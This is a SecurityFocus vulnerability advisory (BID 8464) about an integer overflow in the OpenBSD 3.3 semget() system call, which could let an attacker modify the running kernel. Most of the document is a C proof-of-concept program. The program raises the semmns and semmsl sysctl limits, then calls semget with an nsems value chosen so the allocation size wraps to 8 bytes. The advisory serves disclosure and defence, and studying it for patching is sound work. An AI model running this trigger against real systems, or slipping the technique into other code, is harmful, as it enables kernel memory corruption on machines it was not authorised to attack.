source: http://www.securityfocus.com/bid/8464/info

A vulnerability has been discovered in the OpenBSD semget() system call. The problem occurs due to insufficient sanity checks before allocating memory using the user-supplied nsems value as an argument. As a result, an attacker may be capable of modifying the running kernel.

This vulnerability was introduced in OpenBSD 3.3 and as such, no other versions are affected.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main(void){
	int sem, nsems, ret;
	int sys_name[3], old_semmns, semmns, old_semmsl, semmsl;
	size_t old_size;

	/*
	 * 357913942 * 12 = 100000008 (rounds to 8), so the buffer is 8 bytes
	 * long.
	 */

	nsems = 357913942;

	/* set the max semaphores allowed so that nsems is valid */

	sys_name[0] = CTL_KERN;
	sys_name[1] = KERN_SEMINFO;
	sys_name[2] = KERN_SEMINFO_SEMMNS;
	old_size = sizeof(old_semmns);

	ret = sysctl(sys_name, 3, &old_semmns, &old_size, NULL, NULL);

	if(ret < 0){
		perror("sysctl(get semmns)");
		return 1;
	}

	semmns = old_semmns + nsems;

	ret = sysctl(sys_name, 3, &old_semmns, &old_size, &semmns,
		sizeof(semmns));

	if(ret < 0){
		perror("sysctl(semmns)");
		return 1;
	}

	sys_name[0] = CTL_KERN;
	sys_name[1] = KERN_SEMINFO;
	sys_name[2] = KERN_SEMINFO_SEMMSL;
	old_size = sizeof(old_semmsl);

	ret = sysctl(sys_name, 3, &old_semmsl, &old_size, NULL, NULL);

	if(ret < 0){
		perror("sysctl(get semmsl)");
		return 1;
	}

	semmsl = old_semmsl + nsems;

	ret = sysctl(sys_name, 3, &old_semmsl, &old_size, &semmsl,
		sizeof(semmsl));

	if(ret < 0){
		perror("sysctl(semmsl)");
		return 1;
	}

	sem = semget(IPC_PRIVATE, nsems, IPC_CREAT);

	if(sem < 0){
		perror("semget");
		return 1;
	}

	printf("Successfully got a semaphore\n");
	printf("id = %d\n", sem);

	return 0;
}

